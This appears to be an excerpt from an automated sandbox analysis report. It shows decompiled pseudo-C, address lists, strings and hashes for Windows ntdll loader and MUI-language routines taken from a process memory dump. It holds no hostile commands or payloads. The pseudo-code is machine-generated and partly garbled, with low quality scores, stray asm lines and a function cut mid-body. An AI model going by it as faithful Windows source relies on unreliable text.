					L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E012F1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E012F1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E012F1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01304620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0132F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01331370(_t276, 0x12c4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0132BB40(0,  &_v68, _t170);
									if(L012F43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0132BB40(_t257,  &_v68, _t243);
								if(L012F43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01331370(_t278, 0x12c4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01304620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0132F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01331370(_v16, 0x12c4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0132BB40(_t262,  &_v68, _t244);
								if(L012F43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01331370(_t282, 0x12c4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0132BB40(_t262,  &_v68, _t201);
							if(L012F43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01304620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0132F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01331370(_t280, 0x12c4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0132BB40(_t267,  &_v68, _t245);
							if(L012F43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01331370(_t284, 0x12c4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0132BB40(_t267,  &_v68, _t224);
						if(L012F43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                            0x012f3d3c
                            0x012f3d42
                            0x012f3d44
                            0x012f3d46
                            0x012f3d49
                            0x012f3d4c
                            0x012f3d4f
                            0x012f3d52
                            0x012f3d55
                            0x012f3d58
                            0x012f3d5b
                            0x012f3d5f
                            0x012f3d61
                            0x012f3d66
                            0x01348213
                            0x01348218
                            0x012f4085
                            0x012f4088
                            0x012f408e
                            0x012f4094
                            0x012f409a
                            0x012f40a0
                            0x012f40a6
                            0x012f40a9
                            0x012f40af
                            0x012f40b6
                            0x012f40bd
                            0x012f40bd
                            0x012f3d83
                            0x0134821f
                            0x01348229
                            0x01348238
                            0x01348238
                            0x0134823d
                            0x0134823d
                            0x012f3da0
                            0x012f3daf
                            0x012f3db5
                            0x012f3dba
                            0x012f3dba
                            0x012f3dd4
                            0x012f3e94
                            0x012f3eab
                            0x012f3f6d
                            0x012f3f84
                            0x012f406b
                            0x012f406b
                            0x012f406e
                            0x012f406e
                            0x012f4070
                            0x012f4074
                            0x01348351
                            0x01348351
                            0x012f407a
                            0x012f407f
                            0x0134835d
                            0x01348370
                            0x01348377
                            0x01348379
                            0x0134837c
                            0x0134837c
                            0x0134835d
                            0x00000000
                            0x012f407f
                            0x012f3f8a
                            0x012f3f8d
                            0x012f3f90
                            0x012f3f95
                            0x0134830d
                            0x0134830f
                            0x012f3f9b
                            0x012f3fac
                            0x012f3fae
                            0x012f3fb1
                            0x012f3fb1
                            0x012f3fb6
                            0x01348317
                            0x0134831a
                            0x00000000
                            0x012f3fbc
                            0x012f3fc1
                            0x012f3fc9
                            0x012f3fd7
                            0x012f3fda
                            0x012f3fdd
                            0x012f4021
                            0x012f4021
                            0x012f4029
                            0x012f4030
                            0x012f4044
                            0x012f4046
                            0x012f4046
                            0x012f4044
                            0x012f4049
                            0x01348327
                            0x01348334
                            0x01348339
                            0x0134833c
                            0x012f404f
                            0x012f404f
                            0x012f404f
                            0x012f4051
                            0x012f4056
                            0x012f4063
                            0x012f4063
                            0x012f4068
                            0x00000000
                            0x012f4068
                            0x012f3fdf
                            0x012f3fe2
                            0x012f3fe4
                            0x012f3fe7
                            0x012f3fef
                            0x012f4003
                            0x012f4005
                            0x012f4005
                            0x012f400c
                            0x012f4013
                            0x012f4016
                            0x012f4017
                            0x012f401b
                            0x012f401e
                            0x00000000
                            0x012f401e
                            0x012f3fb6
                            0x012f3eb1
                            0x012f3eb4
                            0x012f3eb7
                            0x012f3ebc
                            0x013482a9
                            0x013482ab
                            0x012f3ec2
                            0x012f3ed3
                            0x012f3ed5
                            0x012f3ed8
                            0x012f3ed8
                            0x012f3edd
                            0x013482b3
                            0x013482b6
                            0x00000000
                            0x012f3ee3
                            0x012f3ee8
                            0x012f3eed
                            0x012f3ef0
                            0x012f3ef3
                            0x012f3f02
                            0x012f3f05
                            0x012f3f08
                            0x013482c0
                            0x013482c3
                            0x013482c5
                            0x013482c8
                            0x013482d0
                            0x013482e4
                            0x013482e6
                            0x013482e6
                            0x013482ed
                            0x013482f4
                            0x013482f7
                            0x013482f8
                            0x013482fc
                            0x013482ff
                            0x013482ff
                            0x012f3f0e
                            0x012f3f11
                            0x012f3f16
                            0x012f3f1d
                            0x012f3f31
                            0x01348307
                            0x01348307
                            0x012f3f31
                            0x012f3f39
                            0x012f3f48
                            0x012f3f4d
                            0x012f3f50
                            0x012f3f50
                            0x012f3f53
                            0x012f3f58
                            0x012f3f65
                            0x012f3f65
                            0x012f3f6a
                            0x00000000
                            0x012f3f6a
                            0x012f3edd
                            0x012f3dda
                            0x012f3ddd
                            0x012f3de0
                            0x012f3de5
                            0x01348245
                            0x012f3deb
                            0x012f3df7
                            0x012f3dfc
                            0x012f3dfe
                            0x012f3e01
                            0x012f3e01
                            0x012f3e06
                            0x0134824d
                            0x0134824f
                            0x01348254
                            0x00000000
                            0x012f3e0c
                            0x012f3e11
                            0x012f3e16
                            0x012f3e19
                            0x012f3e29
                            0x012f3e2c
                            0x012f3e2f
                            0x0134825c
                            0x0134825f
                            0x01348261
                            0x01348264
                            0x0134826c
                            0x01348280
                            0x01348282
                            0x01348282
                            0x01348289
                            0x01348290
                            0x01348293
                            0x01348294
                            0x01348298
                            0x0134829b
                            0x0134829b
                            0x012f3e35
                            0x012f3e38
                            0x012f3e3d
                            0x012f3e44
                            0x012f3e58
                            0x013482a3
                            0x013482a3
                            0x012f3e58
                            0x012f3e60
                            0x012f3e6f
                            0x012f3e74
                            0x012f3e77
                            0x012f3e77
                            0x012f3e7a
                            0x012f3e7f
                            0x012f3e8c
                            0x012f3e8c
                            0x012f3e91
                            0x00000000
                            0x012f3e91

                            Strings
                            • Kernel-MUI-Language-Allowed, xrefs: 012F3DC0
                            • Kernel-MUI-Language-SKU, xrefs: 012F3F70
                            • Kernel-MUI-Language-Disallowed, xrefs: 012F3E97
                            • Kernel-MUI-Number-Allowed, xrefs: 012F3D8C
                            • WindowsExcludedProcs, xrefs: 012F3D6F
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                            • API String ID: 0-258546922
                            • Opcode ID: 90ed2511a58647d842f65387c5fc425bcabedf4744d96ecc30bf5869e8013397
                            • Instruction ID: c856eeb4743ce93a53e88234f7c8c5864e06e36c929c68bcd889b9a64bd52058
                            • Opcode Fuzzy Hash: 90ed2511a58647d842f65387c5fc425bcabedf4744d96ecc30bf5869e8013397
                            • Instruction Fuzzy Hash: 8AF15E72D10259EBCB15DF98C9409EFFBF9FF18A54F14016AE605A7250D770AE01CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01318E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                            Download Yara Rule
                            C-Code - Quality: 44%
                            			E01318E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x13dd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x13d8464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x13d5780 & 0x00000003) != 0) {
							E01365510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x13d5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0132B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x13d7984; // 0xdb2b60
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x13d8464; // 0x75150110
					 *0x13db1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01319B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x13d5780 & 0x00000005) != 0) {
						_push(_t49);
						E01365510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                            0x01318e0f
                            0x01318e16
                            0x01318e19
                            0x01318e1b
                            0x01318e21
                            0x01318e7f
                            0x01318e85
                            0x01359354
                            0x0135936c
                            0x01359371
                            0x0135937b
                            0x01359381
                            0x01359381
                            0x0135937b
                            0x01318e9d
                            0x01318e9d
                            0x01318e29
                            0x01318e2c
                            0x01318e38
                            0x01318e3e
                            0x01318e43
                            0x01318eb5
                            0x01318eb9
                            0x013592aa
                            0x013592af
                            0x013592e8
                            0x013592e8
                            0x013592af
                            0x01318eb9
                            0x01318e45
                            0x01318e53
                            0x01318e5b
                            0x01318e5f
                            0x01318e78
                            0x01318e78
                            0x01318e7d
                            0x01318ec3
                            0x01318ecd
                            0x01318ed2
                            0x01318ed2
                            0x01318ec5
                            0x01318ec5
                            0x00000000
                            0x01318e7d
                            0x01318e67
                            0x01318ea4
                            0x0135931a
                            0x00000000
                            0x00000000
                            0x01359320
                            0x01318ea4
                            0x01318e70
                            0x01359325
                            0x01359340
                            0x01359345
                            0x01359345
                            0x01318e76
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000

                            Strings
                            • Querying the active activation context failed with status 0x%08lx, xrefs: 01359357
                            • minkernel\ntdll\ldrsnap.c, xrefs: 0135933B, 01359367
                            • LdrpFindDllActivationContext, xrefs: 01359331, 0135935D
                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0135932A
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                            • API String ID: 0-3779518884
                            • Opcode ID: e5c56c4aec8757057d6ce6ab9f40c49aebc91231be7b218433717feef301da5f
                            • Instruction ID: 2951359176d84a6910cf134faf52e928bca5aa8877c95f757fd28966522d02eb
                            • Opcode Fuzzy Hash: e5c56c4aec8757057d6ce6ab9f40c49aebc91231be7b218433717feef301da5f
                            • Instruction Fuzzy Hash: 3C412A32A00315DFDF3DAA1C9849B76BBB8AB0174CF0641EDEA0C97559E7705C8083E5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012F8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E012F8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E012F934A() != 0) {
								_t159 = E0136A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x13d5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01365510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x13d5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E012F849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E012F8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E012F8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x13d5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x13d5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01302280(_t92, 0x13d86cc);
															_t94 = E013B9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E013161A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x13d5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E012F8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x13d5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x13d5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0132F380(_t136, 0x12c1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01302280(_t108, 0x13d86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E013161A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E013B9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E012FFFB0(_t118, _t156, 0x13d86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01329A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                            0x012f8799
                            0x012f879d
                            0x012f87a1
                            0x012f87a3
                            0x012f87a8
                            0x012f87c3
                            0x012f87c3
                            0x012f87c8
                            0x012f87d1
                            0x012f87d4
                            0x012f87d8
                            0x012f87e5
                            0x012f87ec
                            0x01349bfe
                            0x01349c00
                            0x01349c02
                            0x01349c08
                            0x01349c0d
                            0x01349c0f
                            0x01349c14
                            0x01349c2d
                            0x01349c32
                            0x01349c37
                            0x01349c3a
                            0x01349c3c
                            0x01349c42
                            0x01349c42
                            0x01349c3c
                            0x01349c02
                            0x012f87da
                            0x012f87df
                            0x012f87e3
                            0x00000000
                            0x00000000
                            0x012f87e3
                            0x012f87f2
                            0x00000000
                            0x012f87fb
                            0x012f87fd
                            0x012f87fe
                            0x012f880e
                            0x012f880f
                            0x012f8810
                            0x012f8814
                            0x012f881a
                            0x012f881c
                            0x012f881f
                            0x012f8821
                            0x012f8822
                            0x012f8824
                            0x012f8826
                            0x012f882c
                            0x012f882e
                            0x01349c48
                            0x01349c48
                            0x012f8834
                            0x012f8834
                            0x012f8837
                            0x00000000
                            0x00000000
                            0x012f8837
                            0x012f882e
                            0x012f883d
                            0x012f8840
                            0x012f8843
                            0x012f8846
                            0x012f8849
                            0x012f884c
                            0x012f884e
                            0x012f8850
                            0x012f8852
                            0x012f8854
                            0x012f8857
                            0x012f88b4
                            0x012f88b6
                            0x012f88b6
                            0x012f8859
                            0x012f8859
                            0x012f8859
                            0x012f8861
                            0x012f8866
                            0x012f886a
                            0x012f893d
                            0x012f8941
                            0x00000000
                            0x012f8947
                            0x012f8947
                            0x012f894a
                            0x012f894c
                            0x00000000
                            0x012f8952
                            0x012f8955
                            0x012f895a
                            0x012f895d
                            0x012f895d
                            0x012f895f
                            0x012f8961
                            0x012f8961
                            0x012f8968
                            0x00000000
                            0x00000000
                            0x012f896a
                            0x012f896b
                            0x012f896e
                            0x00000000
                            0x012f8970
                            0x012f8970
                            0x012f8970
                            0x012f8970
                            0x012f8972
                            0x012f8972
                            0x012f8974
                            0x00000000
                            0x012f897a
                            0x012f897a
                            0x012f897d
                            0x00000000
                            0x012f8983
                            0x01349c65
                            0x01349c6d
                            0x01349c72
                            0x01349c75
                            0x01349c75
                            0x01349c82
                            0x01349c86
                            0x01349c87
                            0x01349c88
                            0x01349c89
                            0x01349c8c
                            0x01349c90
                            0x01349c95
                            0x01349c97
                            0x01349ca0
                            0x01349ca3
                            0x01349ca9
                            0x01349ca9
                            0x00000000
                            0x01349ca9
                            0x01349ca3
                            0x00000000
                            0x01349c97
                            0x012f897d
                            0x00000000
                            0x012f8974
                            0x012f8988
                            0x012f8992
                            0x012f8996
                            0x00000000
                            0x012f8996
                            0x012f894c
                            0x00000000
                            0x012f8870
                            0x012f887b
                            0x012f887d
                            0x012f887f
                            0x012f8881
                            0x012f8884
                            0x012f8884
                            0x012f8886
                            0x012f8889
                            0x012f888c
                            0x012f888e
                            0x012f8891
                            0x012f8891
                            0x012f8898
                            0x00000000
                            0x00000000
                            0x012f889a
                            0x012f889b
                            0x012f889e
                            0x00000000
                            0x00000000
                            0x012f88a0
                            0x012f88a8
                            0x012f88b0
                            0x012f88b2
                            0x012f88d3
                            0x012f88d5
                            0x00000000
                            0x012f88d7
                            0x012f88db
                            0x012f88dc
                            0x012f88e0
                            0x012f88e8
                            0x012f88ee
                            0x012f88f0
                            0x012f88f3
                            0x012f88fc
                            0x012f8901
                            0x012f8906
                            0x012f890c
                            0x012f890c
                            0x012f890f
                            0x012f8916
                            0x012f8917
                            0x012f8918
                            0x012f8919
                            0x012f891a
                            0x012f891f
                            0x012f8921
                            0x01349c52
                            0x01349c55
                            0x01349c5b
                            0x01349cac
                            0x01349cc0
                            0x01349cc0
                            0x01349c55
                            0x012f8927
                            0x012f8927
                            0x012f892f
                            0x012f8933
                            0x00000000
                            0x012f88f5
                            0x012f88f5
                            0x00000000
                            0x012f88f7
                            0x012f88f7
                            0x012f88fa
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x012f88fa
                            0x012f88f5
                            0x012f88f3
                            0x00000000
                            0x012f88d5
                            0x00000000
                            0x012f88b2
                            0x012f88c9
                            0x00000000
                            0x012f88c9
                            0x012f887f
                            0x012f886a
                            0x012f8857
                            0x012f8852
                            0x012f88bf
                            0x012f88bf
                            0x012f87aa
                            0x012f87ad
                            0x012f87ae
                            0x012f87b4
                            0x012f87b5
                            0x012f87b6
                            0x012f87b8
                            0x012f87bd
                            0x012f87c1
                            0x012f87f4
                            0x012f87fa
                            0x00000000
                            0x00000000
                            0x00000000
                            0x012f87c1
                            0x00000000

                            Strings
                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01349C18
                            • minkernel\ntdll\ldrsnap.c, xrefs: 01349C28
                            • LdrpDoPostSnapWork, xrefs: 01349C1E
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                            • API String ID: 2994545307-1948996284
                            • Opcode ID: 937b071af635bd5b209cb977920bb2af94b9c4a2acb17aadfb590c7e400e9639
                            • Instruction ID: 02b3d9b905feac8d2963434f256dfe4370734ee7a251fdb7cb3b51d767b5ae07
